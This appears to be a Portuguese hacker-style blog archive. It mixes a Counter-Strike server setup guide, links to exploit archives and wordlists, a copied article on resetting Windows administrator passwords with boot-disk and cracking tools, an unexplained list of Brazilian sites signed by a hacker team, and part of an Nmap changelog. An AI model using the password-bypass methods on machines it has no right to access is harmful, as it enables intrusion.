http://www.phenoelit.de/dpl/dpl.html

Montar Server de CS.

# Tutorial by ZueR4_

Aconselho a você criar um usuário somente para rodar o servidor:

# useradd cs

Sendo o usuário 'cs', você irá fazer todo o resto:

# su cs

Costumo fazer a instalação no diretório do usuário 'cs':

$ cd ~

Vamos baixar o Half-Life..

$ wget hlds_l_3111_full.bin

Lista de alguns mirrors:
http://mirror.redphive.org/hlds_l_3111_full.bin
http://www.fileshack.com/file.x?fid=186
http://download.boomtown.net/pacth_...ds_3111_full_uk
http://www.fileplanet.com/files/50000/58368.shtml
Instalaremos o HL:

$ ./hlds_l_3110_full.bin

-> Siga as instruções de instalação..

Vamos baixar o Counter-Strike:

$ cd ~/hlds_l
$ wget cs_15_full.tar.gz

Lista de alguns mirrors:
http://www.fileplanet.com/index.asp?section=1854&file=58481
http://www.jetstreamgames.co.nz/files/.../cs_15_full.tar.gz
http://www.heyphucker.com/cs.php
ftp://ftp.gamesdomain.co.uk/pub/.../cs_15_full.tar.gz
http://www.adrenaline.com.br/downloads/.../cs_15_full.tar.gz
Iremos agora descompactar o MOD Counter-Strike:

$ gunzip cs_15_full.tar.gz
$ tar -xvf cs_15_full.tar

Pronto! Você já possui todos os arquivos necessários para rodar o servidor.

Vamos acrescentar o diretório do Half-Life ao ambiente:

$ export LD_LIBRARY_PATH=/home/cs/hlds_l:$LD_LIBRARY_PATH

Para executar o servidor, vai o sintaxe necessária:

$ ./hlds_run -game cstrike +ip -port +maxplayers +map

Exemplo:

$ ./hlds_run -game cstrike +ip 200.123.123.123 -port 27015 +maxplayers 16 +map de_aztec

A porta padrão é a 27015, aqui iremos especificar para no caso de futuramente precisarmos abrir outro servidor.

* Alguns arquivos de configuração importantes:
cstrike/server.cfg (Contém todas as configurações do servidor)
cstrike/mapcycle.txt (Contém a lista dos mapas que irão "rodar" no servidor)
cstrike/motd.txt (Message Of The Day)
Bom, imagino que você esteja usando alguma regra de Firewall, pois bem, abaixo as regras necessárias para que os usuários consigam jogar em seu servidor.

Não me recordo qual a finalidade de cada porta, só lembro que uma delas é para fazer a autenticação na Won.net.

# iptables -A INPUT -s 0.0.0.0/0 -p udp --dport 27015 -j ACCEPT
# iptables -A OUTPUT -s 0.0.0.0/0 -p udp --sport 27012 -j ACCEPT
# iptables -A OUTPUT -s 0.0.0.0/0 -p udp --sport 27010 -j ACCEPT
# iptables -A OUTPUT -s 0.0.0.0/0 -p udp --sport 27005 -j ACCEPT
# iptables -A OUTPUT -s 0.0.0.0/0 -p tcp --sport 7002 -j ACCEPT
# iptables -A OUTPUT -s 0.0.0.0/0 -p tcp --sport 5273 -j ACCEPT
# iptables -A OUTPUT -s 0.0.0.0/0 -p tcp --sport 27040 -j ACCEPT

Dica

Para uma boa diversão é extremamente aconselhável que se tenha um administrador no server. Essa administração pode ser feita através do comando 'rcon' (Remote Control).

Basta especificar no 'server.cfg' uma senha, por exemplo:

rcon_password "zueragostoso"

Agora, quem irá administrar o server, terá antes que mais nada digitar no Console (") o mesmo comando:

$ rcon_password "zueragostoso"

Assim, você identificou a senha, agora basta digitar o comando do servidor, com o "rcon " na frente.
Exemplo: // Trocar de mapa

$ rcon changelevel de_dust

m0rtix.

http://m0rtix.netmisphere2.com/about.htm
http://xpl.netmisphere2.com/
http://exploitlabs.com/advisories.html
http://atticunderground.com/

HackersCenter...

http://www.hackerscenter.com/

WordLists.

ftp://ftp.cerias.purdue.edu/pub/dict/wordlists

Windows Password.

http://www.petri.co.il/forgot_administrator_password.htm

How can I gain access to a Windows NT/2000/XP/2003 computer if I forgot the administrator's password? How can I reset the administrator's password if I forgot it?

Featured Product:

Windows XP/2000/NT Key - Easy to use utility to reset Windows 2003/XP/2K/NT local and domain controller administrator passwords. Download FREE version now!

Ok, so you say you forgot your Windows administrator's password, huh? Oh well, it doesn't really matter if you did or you just say you did. The fact is that you need to gain access to a computer and you cannot "remember" the administrator's password.

How can you get out of this situation without formatting and re-installing the operating system?

One method of gaining access to the system is by trying hard to remember the forgotten password, or a password of another user which has the same level of administrative rights. However I don't think this approach will help you, otherwise you wouldn't be sitting here reading article, would you?)

Another method is by trying to restore a backed up System State (in Windows 2000/XP/2003) or a ERD (in NT 4.0) in which you do remember the password. The problem with doing so is that you'll probably lose all of the recently add users and groups, and all the changed passwords for all of your users since the last backup was made.

A third method might be to install a parallel operating system on a different partition on the same computer, then use a simple trick to gain access to the old system. Read more about it on my Forgot the Administrator's Password? - Alternate Logon Trick article.

Note: If you are looking for password cracking tools that can be used for miscellaneous objectives such as password-protected PDF documents, zipped archives, Office documents, BIOS protection and so on then this pages is NOT for you. See some links at the bottom of this page for hints on where to find such tools, but I can tell you right away that Google might be a better choice for you.

The fourth option is by using 3rd party tools that will enable you to reset the lost password and logon with a blank password.

Update: You can also discuss these topics on the dedicated Petri.co.il Forgot Admin Password Forum.
Translations of this article

There are some translations made of this article. Here are the ones I am aware of (do tell me if you know of another, or if you want to create one in your language):

*

Portuguese - HERE is an excellent translation of this article into Portuguese (by Bruno Koga - Thanks!)
*

Serbian - HERE (by Aleksandar Stojilkovic - thanks!)

Free Tools

Here are some of these tools:

Free Windows password-cracking tools are usually Linux boot disks that have NT file system (NTFS) drivers and software that will read the registry and rewrite the password hashes for any account including the Administrators. This process requires physical access to the console and an available floppy drive but it works like a charm! I've done it myself several times with no glitch or problem whatsoever.

Beware!!! Resetting a user's or administrator's password on some systems (like Windows XP) might cause data loss, especially EFS-encrypted files and saved passwords from within Internet Explorer. To protect yourself against EFS-encrypted files loss you should always export your Private and Public key, along with the keys for the Recovery Agent user. Please read more about EFS on my What's EFS? page. Out of the following list, the only tool that will no cause any harm to EFS-encrypted files on your hard disk is the Windows Password recovery system.

Here are 5 of these free tools:

1.

Windows Password recovery - Can retrieve forgotten admin and users' passwords in minutes. Safest possible option, does not write anything to hard drive.
2.

Petter Nordahl-Hagen's Offline NT Password & Registry Editor - A great boot CD/Floppy that can reset the local administrator's password.
3.

Openwall's John the Ripper - Good boot floppy with cracking capabilities.
4.

EBCD – Emergency Boot CD - Bootable CD, intended for system recovery in the case of software or hardware faults.
5.

Austrumi - Bootable CD for recovering passwords and other cool tools.

If you happen to know about other free tools please let me know .

Note: These password resetting tools are usually good for local users on a stand alone computer. For Domain Admin password resetting procedures please see the Related Articles section at the bottom of this page.

Note: I'd like to put together all the info you have about these issues. If you have any tips, recommended links or any ideas about how to figure out a lost password - please e-mail me and I'll get back to you .
Windows Password recovery

http://www.loginrecovery.com

This site provides a tool to recover lost Windows XP passwords. It works for administrator and user accounts, it doesn't change the password just tells you the old one. It works with encrypted files (EFS) and password hashes. It even works if no passwords at all are known for the machine (as long as you have another computer with internet access to view this website with).

Author claims it also works with Windows NT and Windows Server 2003 and Windows Longhorn, but the BEST thing about it is the fact that it won't reset your passwords, but simply reveal them for you to remember and then use.

Give it a try. The author would like to receive feedback. There is a free service as well as a priority service that will retrieve your passwords within minutes. The fee for the priority service is very cheap, and is really just to cover server costs.

Note: You'll need a blank floppy to run the process.

Update: Author now offers the same tool as a CD image for those of you who do not have a floppy in their computer.

Usage, instructions and additional information can be found at

http://www.loginrecovery.com
Offline NT Password & Registry Editor (v050303)

Petter Nordahl-Hagen has written a Windows NT/2000/XP offline password editor:

http://home.eunet.no/~pnordahl/ntpasswd

*

This is a utility to (re)set the password of any user that has a valid (local) account on your Windows NT/2000/XP/2003 system, by modifying the encrypted password in the registry's SAM file.
*

You do not need to know the old password to set a new one.
*

It works offline, that is, you have to shutdown your computer and boot off a floppy disk or CD. The boot-disk includes stuff to access NTFS partitions and scripts to glue the whole thing together.
*

Works with syskey (no need to turn it off, but you can if you have lost the key)
*

Will detect and offer to unlock locked or disabled out user accounts!

Caution: If used on users that have EFS encrypted files, and the system is XP or later service packs on W2K, all encrypted files for that user will be UNREADABLE! and cannot be recovered unless you remember the old password again!

Download links:

*

bd050303.zip (~1.1MB) - Bootdisk image, date 050303.
*

cd050303.zip (~3MB) - Bootable CD image with same version and drivers as floppies above
*

sc050303.zip(~1.4MB) - SCSI-drivers (050303) (only use newest drivers with newest bootdisk, this one works with bd050303)

To write these images to a floppy disk you'll need RawWrite2 which is included in the Bootdisk image download. To create the CD you just need to use your favorite CD burning program and burn the .ISO file to CD.

Support and Problems? Don't call me! Talk to the creator of this great tool. He also has a good FAQ set up covering most of the day-to-day questions. Read it right HERE

Author claims that this tool was successfully tested on NT 3.51, NT 4, Windows 2000 (except datacenter), Windows XP (all versions) and Window Server 2003. Notice that it is NOT compatible with Active Directory.

Need to change Windows NT/2000 Domain Admin password? This tool, however useful, will only reset the local administrator's password (e.g. the one found in the local computer's SAM). To reset a password of a domain administrator (or any other user for that matter) you must perform the routine that is described in the following page: Forgot the Administrator's Password? - Reset Domain Admin Password in Windows 2000 AD.

Note: The above trick will probably not work under Windows Server 2003 due to service account security changes. To work around these limitations please read the Forgot the Administrator's Password? - Reset Domain Admin Password in Windows Server 2003 AD page.
John the Ripper (v1.6)

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP LM hashes, plus several more with contributed patches.

Read more at http://www.openwall.com/john

Download links:

John the Ripper 1.6 (768kb)
EBCD – Emergency Boot CD (v0.60)

EBCD is a bootable CD, intended for system recovery in the case of software or hardware faults. It is able to create backup copies of normally working system and restore system to saved state. It contains the best system software ever created, properly compiled and configured for the maximum efficient use.

EBCD will be very useful when you need to:

*

Copy/move files (with long names, not necessary in CP437 encoding) from/to the disk but OS which can handle them (windows, Linux...) cannot boot. In particular, you may create a backup copy of normally installed and configured Windows and later restore Windows from such backup copy. So, in the case of fault OS itself and all software and its settings can be restored in 5-10 minutes.
*

Perform emergency boot of Windows NT / 2000 / XP. When the loader of this OS on the hard disk is damaged or misconfigured, you are able to load OS using another, standalone loader from this CD.
*

Recover master boot record of HDD. This allows to boot OS after incorrect uninstallation of custom loader (LILO, for example), which made all OS on your PC not bootable.
*

Delete, move, copy to file (image) and re-create partition from file. Image transfer over network is also supported: so you may configure one PC and then make contents of hard disks of other PCs same as contents of the hard disk of the first one.
*

Change password of any user, including administrator of Windows NT/2000/XP OS. You do not need to know the old password.
*

Recover deleted file, even file re-deleted from Windows Recycle Bin, and, in contrast, wipe single file or a whole disk so that it will be impossible to recover it in any way.
*

Recover data from accidentally formatted disk. Sometimes it helps to recover data from the disk, damaged by a virus.
*

Recover data from a floppy disk, which is not readable by OS. Format 3.5" disk for 1.7 Mb size.

Also the disk includes full set of external DOS commands, console versions of the most popular archivers/compressors.

Moreover, emergency boot CD includes minimal Linux distribution (Rescue Linux distribution) which may be very useful to a professional user.

Read more at http://ebcd.pcministry.com

Download links:

EBCD Pro distribution (18mb)

More download links: HERE, HERE, HERE, HERE and HERE. One of them has got to work, and if not, please send me a note.
Austrumi (v0.9.2 - December 2004)

Austrumi is a Linux bootable ISO image for recovering NT passwords and other cool tools and methods, sized for Business Card size CD media (50Mb). It allows you to change any password, including that of the Administrator, on a partition occupied by Windows NT, Windows 2000 or Windows XP. Simply boot the CD and when you get to the initial boot prompt, type:

boot: nt_pass

This will launch a console utility that will detect Windows partitions on the hard disk and provide you with a menu to modify any user or Administrator passwords on the Windows system. It will even give access to the Windows registry for recovery purposes. Quite a handy utility to keep in your wallet (AUSTRUMI is small enough to fit on a business card-size CD) if you are unfortunate enough to having to deal with Windows machines in your line of work.

Read more at http://sourceforge.net/projects/austrumi

Download links:

Austrumi v0.9.2 (ISO file, 50.9mb)

Xt0rti0n-Team is watching you...

Mercosider.com.br

Friday, April 21, 2006

Post de um lammer...

WALDYHESTER
25/03/2004, 12:46
olá pessoal... Sou o administrador de uma escola de informática, (Há três meses que eu trabalho aqui)me contrataram para substituir um administrador que brincava junto com esse aluno. Tem um aluno aqui que sempre burla o sistema de login do windosXP, (logo que inicia o windons xp aparece ‘administrador’ e ‘convidado’ esse aluno consegue entrar como administrador e baixar e instalar um monte de programas,vírus,etc.) Tenho certeza que ele não sabe a senha pois eu mudo todos os dias, de todas as maquinas.
Tenho que ter esse sistema para não ter que formatar a maquina cada quatro dias. Não posso usar nenhum software de controle que não seja free, pois o dono da escola não esta disposto a investir nisso.

Gostaria de saber como ele faz isso, e como faço para que ele não ‘burle’ este login...

Dica WinXP

http://www.infowester.com/dicaswxp.php

TrueCrypt 4.2 Linux.

We are pleased to announce that TrueCrypt 4.2 has been released. Among the new features is the ability to create a TrueCrypt volume under Linux, ability to create a ‘dynamic’ container whose physical size (actual disk space used) grows as new data is added to it, ability to change volume passwords/keyfiles under Linux, ability to create keyfiles under Linux, ability to restore and backup volume headers under Linux, and many more.

This release makes the Linux version of TrueCrypt completely independent on the Windows version. However, both versions will continue to be mutually compatible. For a comprehensive list of changes, please see http://www.truecrypt.org/history.php

the best crypt program!
+ DriveCrypt Plus Pack - and cops will be suck

I use this with my USB Drive... Like a dream

Best Solution ... don't forget to wipe your cache ...

Sites BR.

www.apc.com
www.igrejanovavida.com.br
www.cenaipr.com.br
www.curitiba.pr.gov.br
www.pr.gov.br
www.decisivo.com.br
www.positivo.com.br
www.kayser.com.br
www.skol.com.br
www.brahma.com.br
www.freeday.com.br
www.dropdead.com.br
www.balaroti.com.br
www.vivo.com.br
www.opetwork.com.br
www.microllins.com.br
www.isbt.com.br
www.snoway.com.br
www.traxart.com.br
www.ipo.com.br
www.hsbc.com.br
www.gazetadopovo.com.br
www.taho.com.br
www.tim.com.br
www.timsul.com.br
www.agf.com.br
www.toyota.com.br
www.brturbo.com.br
www.cocacola.com.br
www.plancontabil.com.br
www.ig.com.br
www.gate7.com.br
www.transanet.com.br
www.dombosco.com.br
www.pizzahutt.com.br
www.volvo.com.br
www.topper.com.br
www.rainha.com.br
www.amigosdoleao.com.br
www.ictv.com.br
www.persianasparana.com.br
www.lemouge.com.br
www.yopa.com.br
www.pedrozo.com.br
www.band.com.br
www.cdeandradeimoveis.com.br
www.binno.com.br
www.motosavages.com.br
www.itapemirim.com.br
www.penha.com.br
www.pionner.com.br
www.gozagaimoveis.com.br
www.votorantim.com.br
www.fuzettocamisetas.com.br
www.atenas.com.br
www.apolar.com.br
www.hp.com.br
www.freegells.com.br
www.siemens.com.br
www.free.com.br
www.marcopolo.com.br
www.ibest.com.br
www.olympikus.com.br
www.tilibra.com.br
www.varig.com.br
www.vasp.com.br
www.tam.com.br
www.perdigao.com.br
www.mercadorama.com.br
www.carrefour.com.br
www.paodeacucar.com.br
www.solarautomoveis.com.br
www.peogeot.com.br
www.gravia.com.br
www.cassol.com.br
www.divesa.com.br
www.euroimport.com
www.ipiranga.com.br
www.vininha.com.br
www.fiat.com.br
www.bsi.com.br
www.spei.br
www.holocaustobrasileiro.com.br
www.suvinil.com.br
www.humortadela.com.br
www.shell.com.br
www.antarctica.com.br
www.tha.com.br
www.ford.com.br
www.mercedes.com.br
www.amil.com.br
www.unimed.com.br
www.bbturismo.com.br
www.tribuna.com.br
www.coritiba.com.br
www.worldstudy.com.br
www.nestle.com.br
www.mandi.net
www.texaco.com.br
www.manpower.com.br
www.correios.com.br
www.sedex.com.br
www.petrobras.com.br
www.clinihauer.com.br
www.ufpr.br
www.pucpr.br
www.chevrolet.com.br
www.honda.com.br
www.onda.com.br
www.renner.com.br
www.arno.com.br
www.redeimoveis.com.br
www.lg.com.br
www.cea.com.br
www.claro.com.br
www.nike.com.br
www.adidas.com.br
www.santos.com.br
www.zaz.com.br
www.ourofino.com.br
www.stival.com.br
www.terra.com.br
www.point.com.br
www.record.com.br
www.mormaii.com.br
www.axe.com.br
www.maha.com.br
www.shoppingestacao.com.br
www.drogamed.com.br
www.telesom.com.br
www.badboy.com.br
www.toyota.com.br
www.cnt.com.br
www.higiserv.com.br
www.proservvi.com.br
www.casasbahia.com.br
www.americanas.com.br
www.submarino.com.br
www.pernambucanas.com.br
www.otis.com.br
www.perl.com.br
www.itau.com.br
www.bradesco.com.br
www.visa.com.br
www.microsoft.com.br
www.philips.com.br
www.toshiba.com.br
www.aiwa.com
www.folhadelondrina.com.br
www.estadao.com.br
www.digerati.com.br
www.casio.com.br
www.esso.com.br
www.colcci.com.br
www.ciclesjaime.com.br
www.7arquitecturas.com
www.tramontina.com.br
www.britania.com.br
www.uol.com.br
www.invasao.com.br
www.marisol.com.br
www.havaianas.com.br
www.malwee.com.br
www.telelistas.net
www.grupopoli.com.br
www.vidyayoga.org
www.uni-yoga.org.br
www.equipaloja.com.br
www.casaeloja.com.br
www.vinhosantafelicidade.com.br
www.queijosevinhoscuritiba.com.br
www.7irmaos.com.br
www.adegacuritibana.com.br
www.siasg.com.br
www.centronic.com.br
www.g5seguranca.com.br
www.engevidros.com.br
www.safetyfilms.com.br
www.mundifilmes.com.br
www.megafilm.com.br
www.casafilm.com.br
www.netpar.com.br
www.grite.com.br
www.boxaristocrata.grite.com.br
www.sos102.com.br
www.aluvidaluminiosevidros.com.br
www.pop.com.br
www.milleniumvidros.com.br
www.engenhare.com.br
www.designvidros.com.br
www.decorvidros.com.br
www.vidracariairmaosbosa.com.br
www.milenio.com.br
www.videoshowdvd.com.br
www.vlcinevideo.com.br
www.vitoriadv.com.br
www.softcine.com.br
www.fotograf.com.br
www.memoryvideo.com.br
www.softall.com.br
www.totalaudiovisual.com.br
www.yahoo.com.br
www.hotmail.com.br
www.rodealbox.telelistas.net
www.saaj.com.br
www.ristarklacres.com.br
www.brooks.com.br
www.olibor.com.br
www.bonafibra.com.br
www.retengax.com.br
www.acasadosvarais.com.br
www.maialocacaodevans.com.br
www.netbank.com.br
www.ondatur.com.br
www.sul.com.br
www.aclturismoreceptivo.com.br
www.prhp.com.br
www.crios.ind.br
www.pontofrio.com.br
www.torneariaplpxavier.com.br
www.tecnohardware.com.br
www.bol.com.br
www.produforme.com.br
www.exclumisa.com.br
www.lasesportes.com.br
www.dikimi.com.br
www.cleyuniformes.com.br
www.swerner.com.br
www.bmvuniformes.com.br
www.walkers.com.br
www.viagenstissi.com.br
www.transisaak.com.br
www.tanguatur.com.br
www.stb.com.br
www.roberanatur.com.br
www.valeturcwb.tur.br
www.picolottoturismo.com.br
www.personnalite.com.br
www.turismodourado.com.br
www.cvbturismo.com.br
www.bbcturismoecologico.com.br
www.bomjesusviajens.com.br
www.avsturismo.com.br
www.authentictour.com.br
www.fretam.com.br
www.grupoblueway.com.br
www.cvt-turismo.com.br
www.alliancetur.com.br
www.viajens-turismo.com
www.creta.com.br
www.boaviagens.com.br
www.adventur.com.br
www.adritur.com.br
www.lacombe.com.br
www.siderinox.com.br
www.sankor-sider.com.br
www.dutex.com.br
www.dragtec.com.br
www.tubometal.com.br
www.bmginox.com.br
www.mtv.com.br
www.ferrari.com.br
www.tamgram.srv.br
www.revistadolinux.com.br
www.uniube.br
www.bigtvjp.com.br
www.nanolab.usf.br
www.cyclades.com.br
www.portalbrasil.org.br
www.softwarelivre.rs.org.br
www.borland.com.br
www.playstation.com
www.execpc.com
www.winehq.com
www.lycoris.com
www.redmondlinux.org
www.theregister.co.uk
www.bungie.com
www.bungie.net
www.google.com.br
www.cade.com.br
www.superdownloads.com.br
www.baixaki.com.br
www.phpbb.com.br
www.vivaolinux.com.br
www.definitylinux.com.br
www.linuxit.com.br
www.eacnet.com.br
www.saude.pb.gov.br
www.integral.com.br
www.conectiva.com.br
www.bematech.com.br
www.swi.com.br
www.xmms.org
www.volnorm.sourceforge.net

Nmap Changelog

# Nmap Changelog ($Id: CHANGELOG,v 1.233 2005/02/05 22:37:54 fyodor Exp $)

Nmap 3.81

o Nmap now ships with and installs (in the same directory as other
data files such as nmap-os-fingerprints) an XSL stylesheet for
rendering the XML output as HTML. This stylesheet was written by
Benjamin Erb ( see http://www.benjamin-erb.de/nmap/ for examples).
It supports tables, version detection, color-coded port states, and
more. The XML output has been augmented to include an
xml-stylesheet directive pointing to nmap.xsl on the local
filesystem. You can point to a different XSL file by providing the
filename or URL to the new --stylesheet argument. Omit the
xml-stylesheet directive entirely by specifying --no-stylesheet.
The XML to HTML conversion can be done with an XSLT processor such
as Saxon, Sablot, or Xalan, but modern browsers can do this on the
fly -- simply load the XML output file in IE or Firefox. Some
features don't currently work with Firefox's on-the-fly rendering.
Perhaps some Mozilla wizard can fix that in either the XSL or the
browser itself. I hate having things work better in IE :). It is
often more convenient to have the stylesheet loaded from a URL
rather than the local filesystem, allowing the XML to be rendered on
any machine regardless of whether/where the XSL is installed. For
privacy reasons (avoid loading of an external URL when you view
results), Nmap uses the local filesystem by default. If you would
like the latest version of the stylesheet load from the web when
rendering, specify
--stylesheet http://www.insecure.org/nmap/data/nmap.xsl .

o Fixed fragmentation option (-f). One -f now sets sends fragments
with just 8 bytes after the IP header, while -ff sends 16 bytes to
reduce the number of fragments needed. You can specify your own
fragmentation offset (must be a multiple of 8) with the new --mtu
flag. Don't also specify -f if you use --mtu. Remember that some
systems (such as Linux with connection tracking) will defragment in
the kernel anyway -- so test first while sniffing with ethereal.
These changes are from a patch by Martin MaÃ¨ok
(martin.macok(a)underground.cz).

o Nmap now prints the number (and total bytes) of raw IP packets sent
and received when it completes, if verbose mode (-v) is enabled. The
report looks like:
Nmap finished: 256 IP addresses (3 hosts up) scanned in 30.632 seconds
Raw packets sent: 7727 (303KB) | Rcvd: 6944 (304KB)

o Fixed (I hope) an error which would cause the Windows version of
Nmap to abort under some circumstances with the error message
"Unexpected error in NSE_TYPE_READ callback. Error code: 10053
(Unknown error)". Problem reported by "Tony Golding"
(biz(a)tonygolding.com).

o Added new "closed|filtered" state. This is used for Idlescan, since
that scan method can't distinguish between those two states. Nmap
previously just used "closed", but this is more accurate.

o Null, FIN, Maimon, and Xmas scans now mark ports as "open|filtered"
instead of "open" when they fail to receive any response from the
target port. After all, it could just as easily be filtered as open.
This is the same change that was made to UDP scan in 3.70. Also as
with UDP scan, adding version detection (-sV) will change the state
from open|filtered to open if it confirms that they really are open.

o Fixed a bug in ACK scan that could cause Nmap to crash with the
message "Unexpected port state: 6" in some cases. Thanks to Glyn
Geoghegan (glyng(a)corsaire.com) for reporting the problem.

o Change IP protocol scan (-sO) so that a response from the target
host in any protocol at all will prove that protocol is open. As
before, no response means "open|filtered", an ICMP protocol
unreachable means "closed", and most other ICMP error messages mean
"filtered".

o Patched a Winpcap issue that prevented read timeouts from being
honored on Solaris (thus slowing down Nmap substantially). The
problem report and patch were sent in by Ben Harris
(bjh21(a)cam.ac.uk).

o Changed IP protocol scan (-sO) so that it sends valid ICMP, TCP, and
UDP headers when scanning protocols 1, 6, and 17, respectively. An
empty IP header is still sent for all other protocols. This should
prevent the error messages such as "sendto in send_ip_packet:
sendto(3, packet, 20, 0, 192.31.33.7, 16) => Operation not
permitted" that Linux (and perhaps other systems) would give when
they try to interpret the raw packet. This also makes it more
likely that these protocols will elicit a response, proving that the
protocol is "open".

o The windows build now uses header and static library files from
Winpcap 3.1Beta4. It also now prints out the DLL version you are
using when run with -d. I would recommend upgrading to 3.1Beta4 if
you have an older Winpcap installed.

o Added an NTP probe and matches to the version detection database
(nmap-service-probes) thanks to a submission from Martin
MaÃ¨ok (martin.macok@underground.cz).

o Applied several Nmap service detection database updates sent in by
Martin MaÃ¨ok (martin.macok(a)underground.cz).

o The XML nmaprun element now has a startstr attribute which gives the
human readable calendar time format that a scan started. Similarly
the finished element now has a timestr attribute describing when the
scan finished. These are in addition to the existing nmaprun/start
and finished/time attributes that provided the start and finish time
in UNIX time_t notation. This should help in development of
XSLT stylesheets for Nmap XML output.

o Fixed a memory leak that would generally consume several hundred
bytes per down host scanned. While the effect for most scans is
negligible, it was overwhelming when Scott Carlson
(Scott.Carlson(a)schwab.com) tried to scan 24 million IPs
(10.0.0.0/8). Thanks to him for reporting the problem. Also thanks
to Valgrind ( http://valgrind.kde.org ) for making it easy to debug.

o Fixed a crash on Windows systems that don't include the iphlpapi
DLL. This affects Win95 and perhaps other variants. Thanks to Ganga
Bhavani (GBhavani(a)everdreamcorp.com) for reporting the problem and
sending the patch.

o Ensured that the device type, os vendor, and os family OS
fingerprinting classification values are scrubbed for XML compliance
in the XML output. Thanks to Matthieu Verbert
(mve(a)zurich.ibm.com) for reporting the problem and sending a patch.

o Rewrote the host IP (target specification) parser for easier
maintenance and to fix a bug found by Netris (netris(a)ok.kz)

o Changed to Nmap XML DTD to use the same xmloutputversion (1.01) as
newer versions of Nmap. Thanks to Laurent Estieux
(laurent.estieux(a)free.fr) for reporting the problem.

o Fixed compilation on some HP-UX 11 boxes thanks to a patch by Petter
Reinholdtsen (pere(a)hungry.com).

o Fixed a portability problem on some OpenBSD and FreeBSD machines
thanks to a patch by Okan Demirmen (okan(a)demirmen.com).

o Applied Martin MaÃ¨ok's (martin.macok(a)underground.cz) "cosmetics
patch", which fixes a few typos and minor problems.

Nmap 3.75

o Implemented a huge OS fingerprint database update. The number of
fingerprints increased more than 20% to 1,353 and many of the
existing ones are much improved. Notable updates include the fourth
edition of Bell Lab's Plan9, Grandstream's BugeTone 101 IP Phone,
and Bart's Network Boot Disk 2.7 (which runs MS-DOS). Oh, and Linux
kernels up to 2.6.8, dozens of new Windows fingerprints including XP
SP2, the latest Longhorn warez, and many modified Xboxes, OpenBSD
3.6, NetBSD up to 2.0RC4, Apple's AirPort Express WAP and OS X
10.3.3 (Panther) release, Novell Netware 6.5, FreeBSD 5.3-BETA, a
bunch of Linksys and D-Link consumer junk, the latest Cisco IOS 12.2
releases, a ton of miscellaneous broadband routers and printers, and
much more.

o Updated nmap-mac-prefixes with the latest OUIs from the IEEE.
[ http://standards.ieee.org/regauth/oui/oui.txt ]

o Updated nmap-protocols with the latest IP protocols from IANA
[ http://www.iana.org/assignments/protocol-numbers ]

o Added a few new Nmap version detection signatures thanks to a patch
from Martin MaÃ¨ok (martin.macok(a)underground.cz).

o Fixed a crash problem in the Windows version of Nmap, thanks to a
patch from Ganga Bhavani GBhavani(a)everdreamcorp.com).

o Fixed Windows service scan crashes that occur with the error message
"Unexpected nsock_loop error. Error code 10022 (Unknown error)". It
turns out that Windows does not allow select() calls with all three
FD sets empty. Lame. The Linux select() man page even suggests
calling "select with all three sets empty, n zero, and a non-null
timeout as a fairly portable way to sleep with subsecond precision."
Thanks to Gisle Vanem (giva(a)bgnett.no) for debugging help.

o Added --max_scan_delay parameter. Nmap will sometimes increase the
delay itself when it detects many dropped packets. For example,
Solaris systems tend to respond with only one ICMP port unreachable
packet per second during a UDP scan. So Nmap will try to detect
this and lower its rate of UDP probes to one per second. This can
provide more accurate results while reducing network congestion, but
it can slow the scans down substantially. By default (with no -T
options specified), Nmap allows this delay to grow to one second per
probe. This option allows you to set a lower or higher maximum.
The -T4 and -T5 scan modes now limit the maximum scan delay for TCP
scans to 10 and 5 ms, respectively.

o Fixed a bug that prevented RPC scan (-sR) from working for UDP ports
unless service detection (-sV) was used. -sV is still usually a
better approach than -sR, as the latter ONLY handles RPC. Thanks to
Stephen Bishop (sbishop(a)idsec.co.uk) for reporting the problem and
sending a patch.

o Fixed nmap_fetchfile() to better find custom versions of data files
such as nmap-services. Note that the implicitly read directory
should be ~/.nmap rather than ~/nmap . So you may have to move any
customized files you now have in ~/nmap . Thanks to nnposter
(nnposter(a)users.sourceforge.net) for reporting the problem and
sending a patch.

o Changed XML output so that the MAC address [address] element comes
right after the IPv4/IPv6 [address] element. Apparently this is
needed to comply with the DTD (
http://www.insecure.org/nmap/data/nmap.dtd ). Thanks to Adam Morgan
(adam.morgan(a)Q1Labs.com) and Florian Ebner
(Florian.Ebner(a)e-bros.de) for the problem reports.

o Fixed an error in the Nmap RPM spec file reported by Pascal Trouvin
(pascal.trouvin(a)wanadoo.fr)

o Fixed a timing problem in which a specified large --send_delay would
sometimes be reduced to 1 second during a scan. Thanks to Martin
MaÃ¨ok (martin.macok(a)underground.cz) for reporting the problem.

o Fixed a timing problem with sneaky and paranoid modes (-T1 and -T0)
which would cause Nmap to continually scan the same port and never
hit other ports when scanning certain firewalled hosts. Thanks to
Curtis Doty (Curtis(a)GreenKey.net) for reporting the problem.

o Fixed a bug in the build system that caused most Nmap subdirectories
to be configured twice. Changing the variable holding the name of
subdirs from $subdirs to $nmap_cfg_subdirs resolved the problem --
configure must have been using that variable name for its own internal
operations. Anyway, this should reduce compile time significantly.

o Made a trivial change to nsock/src/nsock_event.c to work around a "a
bug in GCC 3.3.1 on FreeBSD/sparc64". I found the patch by digging
around the FreeBSD ports tree repository. It would be nice if the
FreeBSD Nmap port maintainers would report such things to me, rather
than fixing it in their own Nmap tree and then applying the patch to
every future version. On the other hand, they deserve some sort of
"most up-to-date" award. I stuck Nmap 3.71-PRE1 in the dist
directory for a few people to test, and made no announcement or
direct link. The FreeBSD crew found it and upgraded anyway :). The
gcc-workaround patch was apparently submitted to the FreeBSD folks
by Marius Strobl (marius(a)alchemy.franken.de).

o Fixed (I hope) an OS detection timing issue which would in some
cases lead to the warning that "insufficient responses for TCP
sequencing (3), OS detection may be less accurate." Thanks to Adam
Kerrison (adam(a)tideway.com) for reporting the problem.

o Modified the warning given when files such as nmap-services exist in
both the compiled in NMAPDATADIR and the current working directory.
That message should now only appear once and is more clear.

o Fixed ping scan subsystem to work a little bit better when
--scan_delay (or some of the slower -T templates which include a scan
delay) is specified. Thanks to Shahid Khan (khan(a)asia.apple.com)
for suggestions.

o Taught connect() scan to properly interpret ICMP protocol
unreachable messages. Thanks to Alan Bishoff
(abishoff(a)arc.nasa.gov) for the report.

o Improved the nmapfe.desktop file to better comply with standards.
Thanks to Stephane Loeuillet (stephane.loeuillet(a)tiscali.fr) for
sending the patch.

Nmap 3.70

o Rewrote core port scanning engine, which is now named ultra_scan().
